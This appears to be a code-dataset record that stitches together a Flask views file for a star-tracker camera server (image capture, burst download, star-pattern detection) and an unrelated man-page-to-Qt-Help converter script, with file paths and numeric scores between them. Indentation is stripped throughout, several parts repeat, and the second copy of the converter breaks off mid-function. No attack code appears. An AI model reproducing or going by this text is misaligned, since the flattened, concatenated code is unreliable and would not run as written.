memory_file = BytesIO()
with zipfile.ZipFile(memory_file, 'w') as zf:
for i in range(1, files+1):
image_name = "{}/{}_{}.tiff".format(images_path, burst_id, i)
image_data = cv2.imread(image_name)
if burst_format == "jpeg":
_, image_data = cv2.imencode(".jpeg", image_data)
image_bytes = image_data.tobytes()
data = zipfile.ZipInfo("{}_{}.{}".format(burst_id, i, burst_format))
data.date_time = time.localtime(time.time())[:6]
data.compress_type = zipfile.ZIP_DEFLATED
zf.writestr(data, image_bytes)
memory_file.seek(0)
attachment_name = "burst_{}_{}.zip".format(burst_id, burst_format)
return send_file(memory_file, attachment_filename=attachment_name,
as_attachment=True)
@app.route("/delete-burst")
def delete_burst():
"""Deletes the burst id given as parameter, this includes all the
images taken by that burst."""
images_path = "server/data/bursts"
burst_id = int(request.args.get('burstId'))
burst = DB.get_burst(burst_id)
files = int(burst['duration'] / burst['interval'])
for i in range(1, files+1):
try:
image_name = "{}/{}_{}.tiff".format(images_path, burst_id, i)
os.remove(image_name)
except Exception as e:
print(e)
DB.delete_burst(burst_id)
return "Done"
@app.route("/upload-image", methods=["POST"])
def upload_image():
"""Saves the image upload by the user and returns its base64 string
to show it in the DOM"""
images_path = f"{FILE_PATH}/data/images"
Path(images_path).mkdir(parents=True, exist_ok=True)
image = request.files['image']
image_ext = image.filename.rsplit(".", 1)[1]
uid = uuid.uuid1()
image.save(f"{images_path}/{uid}.{image_ext}")
saved_image = cv2.imread(f"{images_path}/{uid}.{image_ext}")
_, im_arr = cv2.imencode('.jpg', saved_image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
return jsonify({
'b64_img': img_b64,
'uuid': f"{uid}.{image_ext}",
})
@app.route("/process-image")
def process_image():
"""Process the given image to find stars and returns
the image with the associated data"""
auto_threshold = request.args.get('auto_threshold')
label_guide_stars = request.args.get('label_guide_stars')
images_path = f"{FILE_PATH}/data/images"
response = {}
response['results'] = {}
uid = request.args.get('uuid')
image = cv2.imread(f"{images_path}/{uid}")
gray_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(gray_img, (3, 3), 0)
# Check if auto threshold was selected
logging.warning(auto_threshold)
if auto_threshold == "true":
threshold = ImageUtils.get_threshold(blurred, 170)
msg = {'type': 'info', 'msg': f'Automatic threshold selected: {threshold}'}
else:
threshold = int(request.args.get('threshold'))
msg = {'type': 'info', 'msg': f'Threshold selected by user input: {threshold}'}
response['results']['threshold'] = msg
# Get the threshold image
thresh_image = cv2.threshold(blurred, threshold, 255, cv2.THRESH_BINARY)[1]
# Convert to bytes and encode in base64 to send it in the response
_, im_arr = cv2.imencode('.jpg', thresh_image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
response['b64_thresh_img'] = img_b64
# Get possible image stars
stars = ImageUtils.get_image_stars(thresh_image, gray_img)
# Find pattern if there are at least 4 possible images
pattern = []
if len(stars) >= 4:
pattern = catalog.find_stars_pattern(stars[0:4], err=0.010)
_, im_arr = cv2.imencode('.jpg', image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
response['b64_img'] = img_b64
msg = {'type': 'info', 'msg': f'Possible stars found in the image: {len(stars)}'}
else:
msg = {'type': 'info', 'msg': f'Possible stars found in the image: {len(stars)}'}
response['results']['stars'] = msg
# Histogram
hist = cv2.calcHist([blurred], [0], None, [256], [0, 256])
response['hist'] = hist.tolist()
# If a pattern was found
if len(pattern) > 0:
response['pattern'] = True
# Get original image with pattern drawn
ImageUtils.draw_pattern(image, pattern[0])
# If draw extra guide Stars
if label_guide_stars == "true":
labeled = ImageUtils.draw_guide_stars(image, stars, pattern[0], max=10)
msg = {'type': 'info', 'msg': f'Extra guide stars labeled: {labeled}'}
response['results']['labeled'] = msg
_, im_arr = cv2.imencode('.jpg', image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
response['pattern_points'] = img_b64
msg = {'type': 'success', 'msg': f'Pattern found: {pattern[1]}'}
else:
msg = {'type': 'Error', 'msg': f'Pattern not found'}
response['results']['pattern'] = msg
return jsonify(response) | startrackerpy/server/views.py | import base64
import time
import zipfile
import os
import uuid
import logging
from io import BytesIO
from pathlib import Path
import cv2
from flask import render_template, jsonify, request, send_file
from server import app, catalog
from server.cam import Cam
from server.metrics import Metrics
from server.sensors import DS1621, LSM303, CPU_SENSOR
from server.db import Db
from server.startracker.image import ImageUtils
CAM = Cam()
# Current file Path
FILE_PATH = Path(__file__).parent.absolute()
DB = Db(f"{FILE_PATH}/data/startrackerpy.db")
@app.route("/")
def index():
""" Returns the index html template
"""
return render_template('index.html')
@app.route("/current-frame")
def current_frame():
""" Returns a base64 string with the data of an image.
The image is taken when the function is called.
"""
images_path = f"{FILE_PATH}/data/images"
# Get camera parameters
cam_params = {
'brightness': int(request.args.get('brightness')),
'gamma': int(request.args.get('gamma')),
'gain': int(request.args.get('gain')),
'exposure': int(request.args.get('exposure')),
}
CAM.lock_acquire()
CAM.set_camera_params(cam_params)
time.sleep(1)
_, frame = CAM.read()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
CAM.lock_release()
Path(images_path).mkdir(parents=True, exist_ok=True)
uid = uuid.uuid1()
_, im_arr = cv2.imencode('.jpg', frame)
cv2.imwrite(f"{images_path}/{uid}.jpg", frame)
im_bytes = im_arr.tobytes()
im_b64 = base64.b64encode(im_bytes).decode("ascii")
return jsonify({
'b64_img': im_b64,
'uuid': f"{uid}.jpg",
})
@app.route("/current-frame-tiff")
def current_frame_tiff():
""" Returns a base64 string with the data of an image.
The image is taken when the function is called.
"""
# Get camera parameters
cam_params = {
'brightness': int(request.args.get('brightness')),
'gamma': int(request.args.get('gamma')),
'gain': int(request.args.get('gain')),
'exposure': int(request.args.get('exposure')),
}
CAM.lock_acquire()
CAM.set_camera_params(cam_params)
# Give some time to set the camera parameters
time.sleep(1.5)
_, frame = CAM.read()
cv2.imwrite('test.tiff', frame)
CAM.lock_release()
return "Done"
@app.route("/get-camera-params")
def get_camera_params():
""" Returns a JSON with the current parameters of the camera.
"""
params = CAM.get_camera_params()
return jsonify(params)
@app.route("/get-metrics/<minutes>")
def get_metrics(minutes):
""" Returns metrics from influxdb for the last
X minutes.
"""
metrics = Metrics.get_metrics(from_time=int(minutes))
return jsonify(metrics)
@app.route("/queue-burst")
def queue_burst():
""" Queues a burst of images.
"""
duration = request.args.get('duration')
interval = request.args.get('interval')
brightness = int(request.args.get('brightness'))
gamma = int(request.args.get('gamma'))
gain = int(request.args.get('gain'))
exposure = int(request.args.get('exposure'))
if int(duration) / int(interval) > 600:
return jsonify({
'result': 'error',
'id': -1,
'msg': 'Maximum numer of frames(600) exceeded'
})
# Add a row to queue the burst
row_id = DB.insert_burst(duration, interval, brightness, gamma,
gain, exposure)
return jsonify({
'result': 'ok',
'id': row_id,
'msg': 'The burst has been queued'
})
@app.route("/get-bursts")
def get_bursts():
"""Returns an html table with the burst retrieved from the DB.
"""
bursts = DB.get_bursts()
return render_template('bursts.html', bursts=bursts)
@app.route("/download-burst")
def download_burst():
"""Returns an html table with the burst retrieved from the DB.
"""
images_path = "server/data/bursts"
burst_id = int(request.args.get('burstId'))
burst_format = request.args.get('format')
burst = DB.get_burst(burst_id)
files = int(burst['duration'] / burst['interval'])
memory_file = BytesIO()
with zipfile.ZipFile(memory_file, 'w') as zf:
for i in range(1, files+1):
image_name = "{}/{}_{}.tiff".format(images_path, burst_id, i)
image_data = cv2.imread(image_name)
if burst_format == "jpeg":
_, image_data = cv2.imencode(".jpeg", image_data)
image_bytes = image_data.tobytes()
data = zipfile.ZipInfo("{}_{}.{}".format(burst_id, i, burst_format))
data.date_time = time.localtime(time.time())[:6]
data.compress_type = zipfile.ZIP_DEFLATED
zf.writestr(data, image_bytes)
memory_file.seek(0)
attachment_name = "burst_{}_{}.zip".format(burst_id, burst_format)
return send_file(memory_file, attachment_filename=attachment_name,
as_attachment=True)
@app.route("/delete-burst")
def delete_burst():
"""Deletes the burst id given as parameter, this includes all the
images taken by that burst."""
images_path = "server/data/bursts"
burst_id = int(request.args.get('burstId'))
burst = DB.get_burst(burst_id)
files = int(burst['duration'] / burst['interval'])
for i in range(1, files+1):
try:
image_name = "{}/{}_{}.tiff".format(images_path, burst_id, i)
os.remove(image_name)
except Exception as e:
print(e)
DB.delete_burst(burst_id)
return "Done"
@app.route("/upload-image", methods=["POST"])
def upload_image():
"""Saves the image upload by the user and returns its base64 string
to show it in the DOM"""
images_path = f"{FILE_PATH}/data/images"
Path(images_path).mkdir(parents=True, exist_ok=True)
image = request.files['image']
image_ext = image.filename.rsplit(".", 1)[1]
uid = uuid.uuid1()
image.save(f"{images_path}/{uid}.{image_ext}")
saved_image = cv2.imread(f"{images_path}/{uid}.{image_ext}")
_, im_arr = cv2.imencode('.jpg', saved_image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
return jsonify({
'b64_img': img_b64,
'uuid': f"{uid}.{image_ext}",
})
@app.route("/process-image")
def process_image():
"""Process the given image to find stars and returns
the image with the associated data"""
auto_threshold = request.args.get('auto_threshold')
label_guide_stars = request.args.get('label_guide_stars')
images_path = f"{FILE_PATH}/data/images"
response = {}
response['results'] = {}
uid = request.args.get('uuid')
image = cv2.imread(f"{images_path}/{uid}")
gray_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(gray_img, (3, 3), 0)
# Check if auto threshold was selected
logging.warning(auto_threshold)
if auto_threshold == "true":
threshold = ImageUtils.get_threshold(blurred, 170)
msg = {'type': 'info', 'msg': f'Automatic threshold selected: {threshold}'}
else:
threshold = int(request.args.get('threshold'))
msg = {'type': 'info', 'msg': f'Threshold selected by user input: {threshold}'}
response['results']['threshold'] = msg
# Get the threshold image
thresh_image = cv2.threshold(blurred, threshold, 255, cv2.THRESH_BINARY)[1]
# Convert to bytes and encode in base64 to send it in the response
_, im_arr = cv2.imencode('.jpg', thresh_image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
response['b64_thresh_img'] = img_b64
# Get possible image stars
stars = ImageUtils.get_image_stars(thresh_image, gray_img)
# Find pattern if there are at least 4 possible images
pattern = []
if len(stars) >= 4:
pattern = catalog.find_stars_pattern(stars[0:4], err=0.010)
_, im_arr = cv2.imencode('.jpg', image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
response['b64_img'] = img_b64
msg = {'type': 'info', 'msg': f'Possible stars found in the image: {len(stars)}'}
else:
msg = {'type': 'info', 'msg': f'Possible stars found in the image: {len(stars)}'}
response['results']['stars'] = msg
# Histogram
hist = cv2.calcHist([blurred], [0], None, [256], [0, 256])
response['hist'] = hist.tolist()
# If a pattern was found
if len(pattern) > 0:
response['pattern'] = True
# Get original image with pattern drawn
ImageUtils.draw_pattern(image, pattern[0])
# If draw extra guide Stars
if label_guide_stars == "true":
labeled = ImageUtils.draw_guide_stars(image, stars, pattern[0], max=10)
msg = {'type': 'info', 'msg': f'Extra guide stars labeled: {labeled}'}
response['results']['labeled'] = msg
_, im_arr = cv2.imencode('.jpg', image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
response['pattern_points'] = img_b64
msg = {'type': 'success', 'msg': f'Pattern found: {pattern[1]}'}
else:
msg = {'type': 'Error', 'msg': f'Pattern not found'}
response['results']['pattern'] = msg
return jsonify(response) | 0.589835 | 0.217275 |
# Copyright (c) 2018 <NAME>
import argparse
from collections import OrderedDict
import glob
import os.path
import re
import subprocess
import sys
from html.parser import HTMLParser
from typing import Callable, List, NamedTuple, Optional, Tuple
__version__ = "0.2"
DEFAULT_NAMESPACE = "man.linux.org.1.0"
IN_PATH = "/usr/share/man/man%s"
MAN_LINK = re.compile(r"<b>(\w+)</b>\((\d+p?)\)")
IMAGE_NAME_RE = re.compile(r"(?P<keyword>.+?)-\d+\.\w+")
QHP_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<QtHelpProject version="1.0">
<namespace>{namespace}</namespace>
<virtualFolder>man-pages</virtualFolder>
<customFilter name="Linux Man 1.0">
<filterAttribute>man</filterAttribute>
</customFilter>
""", """</QtHelpProject>
"""
CATEGORY_TEMPLATE = """<filterSection>
<filterAttribute>man</filterAttribute>
<filterAttribute>{filter_category}</filterAttribute>
<keywords>
""", """\
</keywords>
<files>
""", """\
</files>
</filterSection>
"""
class BasePath(object):
def __init__(self, path: str):
self._path = path
def join(self, *paths: str) -> str:
return os.path.join(self._path, *paths)
Options = NamedTuple("Options", [
("cache_path", BasePath),
("qhp", str),
("force", bool),
("sources", List[str]),
("qhp_namespace", str),
("quiet", bool),
("print", Callable)
])
LevelResult = NamedTuple("LevelResult", [
("keywords", List["Keyword"]),
("cross_references", List[Tuple[str, str]]),
("has_errors", bool),
])
def man_path(level: int, page: Optional[str]=None) -> str:
if page is None:
return IN_PATH % level
return os.path.join(IN_PATH % level, page)
def src_bzip(path: str) -> str:
return subprocess.check_output(["bunzip2", "-c", path]).decode("utf-8", errors="replace")
def src_raw(path: str) -> str:
with open(path, "r") as f:
return f.read()
def remove_extensions(source: str, *extensions: str) -> str:
base, ext = os.path.splitext(source)
if ext in extensions:
return remove_extensions(base, *extensions)
return source
def result_name(source_name: str, level: str) -> str:
stripped = remove_extensions(os.path.basename(source_name), ".bz2", "." + level)
return stripped + ".html"
def src(path: str) -> Optional[Tuple[Optional[str], str, Optional[str]]]:
if not os.path.exists(path):
print("Does not exist:", path)
return None
base = os.path.basename(path)
if path.endswith(".bz2"):
data = src_bzip(path)
name = os.path.splitext(base)[0]
else:
data = src_raw(path)
name = base
name = os.path.splitext(name)[0]
if data.startswith(".so "):
alias = data.strip().split("\n")
if len(alias) == 1:
alias = alias[0]
alias_info = re.match(r"\.so\s+(?:.*?/)?man(\d+)/([\w_-]+)", alias)
if alias_info is not None:
alias_path = man_path(int(alias_info.group(1)), alias_info.group(2))
else:
alias_info = re.match(r"\.so\s+([\w_-]+\.(\d))", alias)
if alias_info is not None:
alias_path = man_path(int(alias_info.group(2)), alias_info.group(1))
else:
print("not understood alias:", name, data)
return None
candidates = glob.glob(alias_path + ".*")
if len(candidates) == 0:
print("No matching alias source:", alias_path)
return None
elif len(candidates) > 1:
print("Too many candidates:", name, "/", alias)
print("\n".join(candidates))
return None
else:
return None, name, candidates[0]
else:
return data, name, None
class TitleFinder(HTMLParser):
def __init__(self):
super(TitleFinder, self).__init__()
self._in_title = False
self._title = ""
@property
def title(self):
return self._title
def error(self, message):
print(message)
def handle_starttag(self, tag, attrs):
if tag == "title" and not self._in_title:
if len(self._title) == 0:
self._in_title = True
else:
print("Multiple title-elements")
super().handle_starttag(tag, attrs)
def handle_endtag(self, tag):
if tag == "title" and self._in_title:
self._in_title = False
super().handle_endtag(tag)
def handle_data(self, data):
if self._in_title:
self._title += data
super().handle_data(data)
def title_tag(text: str) -> str:
return "<title>" + text + "</title>"
class Keyword(object):
def __init__(self, keyword: str, target: str, is_alias: bool = False):
self.keyword = keyword
"Keyword, such as `select`."
self.target = target
"Output or target filename."
self.is_alias = is_alias
"If `True`, `target` points to the alias target."
def link_replacer(ref_list: List[Tuple[str, str]]):
def fn(match) -> str:
name = match.group(1)
level = match.group(2)
ref_list.append((level, name))
return '<a href="../html.' + level + '/' + name + '.html">' + match.group(0) + '</a>'
return fn
def do_level(level: str, options: Options) -> LevelResult:
level_keywords = [] # type: List[Keyword]
cross_references = [] # type: List[Tuple[str, str]]
has_errors = False
out_dir = options.cache_path.join("html.%s" % level)
if not os.path.exists(out_dir):
os.mkdir(out_dir)
images_dir = os.path.join(out_dir, "images")
if not os.path.exists(images_dir):
os.mkdir(images_dir)
in_dir = IN_PATH % level
# Needed for images to work correctly with relative path.
original_dir = os.getcwd()
os.chdir(out_dir)
for f in os.listdir(in_dir):
source_filename = os.path.join(in_dir, f)
source_mtime = os.path.getmtime(source_filename)
src_result = src(source_filename)
if src_result is None:
continue
man_data, name, alias = src_result
if man_data is None:
base_name = result_name(alias, level)
target = options.cache_path.join("html.%s" % level, base_name)
options.print("alias", name, "=", target)
level_keywords.append(Keyword(name, target, is_alias=True))
continue
base_name = result_name(name, level)
target = options.cache_path.join("html.%s" % level, base_name)
out_file = base_name
level_keywords.append(Keyword(name, target))
if not options.force and os.path.exists(out_file) and abs(os.path.getmtime(out_file) - source_mtime) < 1.0:
options.print("keyword", name, "=", out_file, " # UNCHANGED delta %ss" %
str(os.path.getmtime(out_file) - source_mtime))
continue
options.print("keyword", name, "=", target)
# Define path and name for images.
image_args = [
"-P", "-D" + "images",
"-P", "-I" + name + "-",
]
process = subprocess.run("groff -t -m mandoc -mwww -Thtml".split() + image_args,
input=man_data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8")
html_data = process.stdout
error_text = process.stderr
if error_text:
print("entry %s:" % name, error_text, file=sys.stderr)
if process.returncode != 0:
print("error running groff: %d. output not written" % process.returncode)
has_errors = True
continue
parser = TitleFinder()
parser.feed(html_data)
# Replace all caps title to something more informative.
html_data = html_data.replace(title_tag(parser.title), title_tag(parser.title.lower() + " | man" + str(level)))
# Replace all cross-references to other man-pages with links to them, regardless whether they exist or not.
html_data = MAN_LINK.sub(link_replacer(cross_references), html_data)
with open(out_file, "w") as o:
o.write(html_data)
# Set result file modification time to source time to allow checking changes in future.
os.utime(out_file, (source_mtime, source_mtime))
# Restore working directory.
os.chdir(original_dir)
level_files = set(os.path.basename(kw.target) for kw in level_keywords if not kw.is_alias)
for file in os.listdir(out_dir):
if os.path.isfile(file) and file not in level_files:
to_remove = os.path.join(out_dir, file)
options.print("delete", to_remove)
os.remove(to_remove)
keywords = set(kw.keyword for kw in level_keywords if not kw.is_alias)
for file in os.listdir(images_dir):
match = IMAGE_NAME_RE.match(file)
if match is not None:
kw = match.group(1)
if kw in keywords:
continue
to_remove = os.path.join(images_dir, file)
options.print("delete", to_remove)
os.remove(to_remove)
return LevelResult(level_keywords, cross_references, has_errors)
def do_levels(options: Options):
kws = OrderedDict()
cross_references = []
has_errors = False
for level in options.sources:
options.print("category", level)
lkw, cross, errors = do_level(level, options)
options.print("end category", level)
kws[level] = lkw
cross_references.extend(cross)
has_errors |= errors
# Qt Help requires that the files included and the project file are in same directory.
catalog = options.cache_path.join(options.qhp)
with open(catalog, "w") as o:
o.write(QHP_TEMPLATE[0].format(namespace=options.qhp_namespace))
for level, keywords in kws.items():
o.write(CATEGORY_TEMPLATE[0].format(filter_category="man" + str(level)))
for kw in keywords:
o.write(' <keyword name="{}" ref="{}" />\n'.format(kw.keyword, kw.target))
o.write(CATEGORY_TEMPLATE[1])
o.write(" <file>html." + level + "/*.html</file>\n")
o.write(" <file>html." + level + "/images/*</file>\n")
o.write(CATEGORY_TEMPLATE[2])
o.write(QHP_TEMPLATE[1])
print("Wrote catalog to", catalog)
if has_errors:
print("Processing had errors and some files were skipped.")
else:
print("To actually create the help file, use qhelpgenerator", catalog)
def check_system() -> bool:
def which(name: str, message: str) -> bool:
try:
subprocess.check_output(["which", name], stderr=subprocess.STDOUT)
return True
except subprocess.CalledProcessError:
print("Missing", message)
return False
e = which("groff", "main part, groff, the document formatting system")
e &= which("pnmtopng", "netpbm (or pnmtopng)")
e &= which("psselect", "psutils (or psselect)")
return e
def make_argument_parser():
parser = argparse.ArgumentParser(
description="man-page to Qt Help converter."
)
parser.add_argument("levels", nargs="+", metavar="LEVEL",
help="man-page level to add for conversion, such as 2")
parser.add_argument("--cache-dir", type=str, metavar="DIR", default=".",
help="Use given cache root directory instead of current directory.")
parser.add_argument("-f", "--force", action="store_true", default=False,
help="Re-write all files.")
parser.add_argument("-o", "--output", type=str, default="man.qhp",
help="Write to given file instead of man.qhp."
" Note, the file will be forced into the cache directory!")
parser.add_argument("--ignore-system-check", action="store_true", default=False,
help="Ignore system check results and process anyways.")
parser.add_argument("-q", "--quiet", action="store_true", default=False,
help="Make less noise.")
qhp = parser.add_argument_group("Qt Help Project options")
qhp.add_argument("--namespace", default=DEFAULT_NAMESPACE,
help="Namespace to use instead of %s" % DEFAULT_NAMESPACE)
parser.add_argument("--version", action="version", version="%(prog)s " + __version__)
return parser
def main(*argv):
parser = make_argument_parser()
args = parser.parse_args(args=None if len(argv) == 0 else argv)
if not (check_system() or args.ignore_system_check):
sys.exit(1)
quiet = args.quiet
def q_print(*p_args, **p_kwargs):
if not quiet:
print(*p_args, **p_kwargs)
options = Options(
cache_path=BasePath(args.cache_dir),
qhp=os.path.basename(args.output),
force=args.force,
sources=args.levels,
qhp_namespace=args.namespace,
quiet=args.quiet,
print=q_print,
)
do_levels(options)
if __name__ == "__main__":
main() | man2qhelp.py |
# Copyright (c) 2018 <NAME>
import argparse
from collections import OrderedDict
import glob
import os.path
import re
import subprocess
import sys
from html.parser import HTMLParser
from typing import Callable, List, NamedTuple, Optional, Tuple
__version__ = "0.2"
DEFAULT_NAMESPACE = "man.linux.org.1.0"
IN_PATH = "/usr/share/man/man%s"
MAN_LINK = re.compile(r"<b>(\w+)</b>\((\d+p?)\)")
IMAGE_NAME_RE = re.compile(r"(?P<keyword>.+?)-\d+\.\w+")
QHP_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<QtHelpProject version="1.0">
<namespace>{namespace}</namespace>
<virtualFolder>man-pages</virtualFolder>
<customFilter name="Linux Man 1.0">
<filterAttribute>man</filterAttribute>
</customFilter>
""", """</QtHelpProject>
"""
CATEGORY_TEMPLATE = """<filterSection>
<filterAttribute>man</filterAttribute>
<filterAttribute>{filter_category}</filterAttribute>
<keywords>
""", """\
</keywords>
<files>
""", """\
</files>
</filterSection>
"""
class BasePath(object):
def __init__(self, path: str):
self._path = path
def join(self, *paths: str) -> str:
return os.path.join(self._path, *paths)
Options = NamedTuple("Options", [
("cache_path", BasePath),
("qhp", str),
("force", bool),
("sources", List[str]),
("qhp_namespace", str),
("quiet", bool),
("print", Callable)
])
LevelResult = NamedTuple("LevelResult", [
("keywords", List["Keyword"]),
("cross_references", List[Tuple[str, str]]),
("has_errors", bool),
])
def man_path(level: int, page: Optional[str]=None) -> str:
if page is None:
return IN_PATH % level
return os.path.join(IN_PATH % level, page)
def src_bzip(path: str) -> str:
return subprocess.check_output(["bunzip2", "-c", path]).decode("utf-8", errors="replace")
def src_raw(path: str) -> str:
with open(path, "r") as f:
return f.read()
def remove_extensions(source: str, *extensions: str) -> str:
base, ext = os.path.splitext(source)
if ext in extensions:
return remove_extensions(base, *extensions)
return source
def result_name(source_name: str, level: str) -> str:
stripped = remove_extensions(os.path.basename(source_name), ".bz2", "." + level)
return stripped + ".html"
def src(path: str) -> Optional[Tuple[Optional[str], str, Optional[str]]]:
if not os.path.exists(path):
print("Does not exist:", path)
return None
base = os.path.basename(path)
if path.endswith(".bz2"):
data = src_bzip(path)
name = os.path.splitext(base)[0]
else:
data = src_raw(path)
name = base
name = os.path.splitext(name)[0]
if data.startswith(".so "):
alias = data.strip().split("\n")
if len(alias) == 1:
alias = alias[0]
alias_info = re.match(r"\.so\s+(?:.*?/)?man(\d+)/([\w_-]+)", alias)
if alias_info is not None:
alias_path = man_path(int(alias_info.group(1)), alias_info.group(2))
else:
alias_info = re.match(r"\.so\s+([\w_-]+\.(\d))", alias)
if alias_info is not None:
alias_path = man_path(int(alias_info.group(2)), alias_info.group(1))
else:
print("not understood alias:", name, data)
return None
candidates = glob.glob(alias_path + ".*")
if len(candidates) == 0:
print("No matching alias source:", alias_path)
return None
elif len(candidates) > 1:
print("Too many candidates:", name, "/", alias)
print("\n".join(candidates))
return None
else:
return None, name, candidates[0]
else:
return data, name, None
class TitleFinder(HTMLParser):
def __init__(self):
super(TitleFinder, self).__init__()
self._in_title = False
self._title = ""
@property
def title(self):
return self._title
def error(self, message):
print(message)
def handle_starttag(self, tag, attrs):
if tag == "title" and not self._in_title:
if len(self._title) == 0:
self._in_title = True
else:
print("Multiple title-elements")
super().handle_starttag(tag, attrs)
def handle_endtag(self, tag):
if tag == "title" and self._in_title:
self._in_title = False
super().handle_endtag(tag)
def handle_data(self, data):
if self._in_title:
self._title += data
super().handle_data(data)
def title_tag(text: str) -> str:
return "<title>" + text + "</title>"
class Keyword(object):
def __init__(self, keyword: str, target: str, is_alias: bool = False):
self.keyword = keyword
"Keyword, such as `select`."
self.target = target
"Output or target filename."
self.is_alias = is_alias
"If `True`, `target` points to the alias target."
def link_replacer(ref_list: List[Tuple[str, str]]):
def fn(match) -> str:
name = match.group(1)
level = match.group(2)
ref_list.append((level, name))
return '<a href="../html.' + level + '/' + name + '.html">' + match.group(0) + '</a>'
return fn
def do_level(level: str, options: Options) -> LevelResult:
level_keywords = [] # type: List[Keyword]
cross_references = [] # type: List[Tuple[str, str]]
has_errors = False
out_dir = options.cache_path.join("html.%s" % level)
if not os.path.exists(out_dir):
os.mkdir(out_dir)
images_dir = os.path.join(out_dir, "images")
if not os.path.exists(images_dir):
os.mkdir(images_dir)
in_dir = IN_PATH % level
# Needed for images to work correctly with relative path.
original_dir = os.getcwd()
os.chdir(out_dir)
for f in os.listdir(in_dir):
source_filename = os.path.join(in_dir, f)
source_mtime = os.path.getmtime(source_filename)
src_result = src(source_filename)
if src_result is None:
continue
man_data, name, alias = src_result
if man_data is None:
base_name = result_name(alias, level)
target = options.cache_path.join("html.%s" % level, base_name)
options.print("alias", name, "=", target)
level_keywords.append(Keyword(name, target, is_alias=True))
continue
base_name = result_name(name, level)
target = options.cache_path.join("html.%s" % level, base_name)
out_file = base_name
level_keywords.append(Keyword(name, target))
if not options.force and os.path.exists(out_file) and abs(os.path.getmtime(out_file) - source_mtime) < 1.0:
options.print("keyword", name, "=", out_file, " # UNCHANGED delta %ss" %
str(os.path.getmtime(out_file) - source_mtime))
continue
options.print("keyword", name, "=", target)
# Define path and name for images.
image_args = [
"-P", "-D" + "images",
"-P", "-I" + name + "-",
]
process = subprocess.run("groff -t -m mandoc -mwww -Thtml".split() + image_args,
input=man_data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8")
html_data = process.stdout
error_text = process.stderr
if error_text:
print("entry %s:" % name, error_text, file=sys.stderr)
if process.returncode != 0:
print("error running groff: %d. output not written" % process.returncode)
has_errors = True
continue
parser = TitleFinder()
parser.feed(html_data)
# Replace all caps title to something more informative.
html_data = html_data.replace(title_tag(parser.title), title_tag(parser.title.lower() + " | man" + str(level)))
# Replace all cross-references to other man-pages with links to them, regardless whether they exist or not.
html_data = MAN_LINK.sub(link_replacer(cross_references), html_data)
with open(out_file, "w") as o:
o.write(html_data)
# Set result file modification time to source time to allow checking changes in future.
os.utime(out_file, (source_mtime, source_mtime))
# Restore working directory.
os.chdir(original_dir)
level_files = set(os.path.basename(kw.target) for kw in level_keywords if not kw.is_alias)
for file in os.listdir(out_dir):
if os.path.isfile(file) and file not in level_files:
to_remove = os.path.join(out_dir, file)
options.print("delete", to_remove)
os.remove(to_remove)
keywords = set(kw.keyword for kw in level_keywords if not kw.is_alias)
for file in os.listdir(images_dir):
match = IMAGE_NAME_RE.match(file)
if match is not None:
kw = match.group(1)
if kw in keywords:
continue
to_remove = os.path.join(images_dir, file)
options.print("delete", to_remove)
os.remove(to_remove)
return LevelResult(level_keywords, cross_references, has_errors)
def do_levels(options: Options):
kws = OrderedDict()
cross_references = []
has_errors = False
for level in options.sources:
options.print("category", level)
lkw, cross, errors = do_level(level, options)
options.print("end category", level)
kws[level] = lkw
cross_references.extend(cross)
has_errors |= errors
# Qt Help requires that the files included and the project file are in same directory.
catalog = options.cache_path.join(options.qhp)
with open(catalog, "w") as o:
o.write(QHP_TEMPLATE[0].format(namespace=options.qhp_namespace))
for level, keywords in kws.items():
o.write(CATEGORY_TEMPLATE[0].format(filter_category="man" + str(level)))
for kw in keywords:
o.write(' <keyword name="{}" ref="{}" />\n'.format(kw.keyword, kw.target))
o.write(CATEGORY_TEMPLATE[1])
o.write(" <file>html." + level + "/*.html</file>\n")
o.write(" <file>html." + level + "/images/*</file>\n")
o.write(CATEGORY_TEMPLATE[2])
o.write(QHP_TEMPLATE[1])
print("Wrote catalog to", catalog)
if has_errors:
print("Processing had errors and some files were skipped.")
else:
print("To actually create the help file, use qhelpgenerator", catalog)
def check_system() -> bool:
def which(name: str, message: str) -> bool:
try:
subprocess.check_output(["which", name], stderr=subprocess.STDOUT)
return True
except subprocess.CalledProcessError:
print("Missing", message)
return False
e = which("groff", "main part, groff, the document formatting system")
e &= which("pnmtopng", "netpbm (or pnmtopng)")
e &= which("psselect", "psutils (or psselect)")
return e
def make_argument_parser():
parser = argparse.ArgumentParser(
description="man-page to Qt Help converter."
)
parser.add_argument("levels", nargs="+", metavar="LEVEL",
help="man-page level to add for conversion, such as 2")
parser.add_argument("--cache-dir", type=str, metavar="DIR", default=".",
help="Use given cache root directory instead of current directory.")
parser.add_argument("-f", "--force", action="store_true", default=False,
help="Re-write all files.")
parser.add_argument("-o", "--output", type=str, default="man.qhp",
help="Write to given file instead of man.qhp."
" Note, the file will be forced into the cache directory!")
parser.add_argument("--ignore-system-check", action="store_true", default=False,
help="Ignore system check results and process anyways.")
parser.add_argument("-q", "--quiet", action="store_true", default=False,
help="Make less noise.")
qhp = parser.add_argument_group("Qt Help Project options")
qhp.add_argument("--namespace", default=DEFAULT_NAMESPACE,
help="Namespace to use instead of %s" % DEFAULT_NAMESPACE)
parser.add_argument("--version", action="version", version="%(prog)s " + __version__)
return parser
def main(*argv):
parser = make_argument_parser()
args = parser.parse_args(args=None if len(argv) == 0 else argv)
if not (check_system() or args.ignore_system_check):
sys.exit(1)
quiet = args.quiet
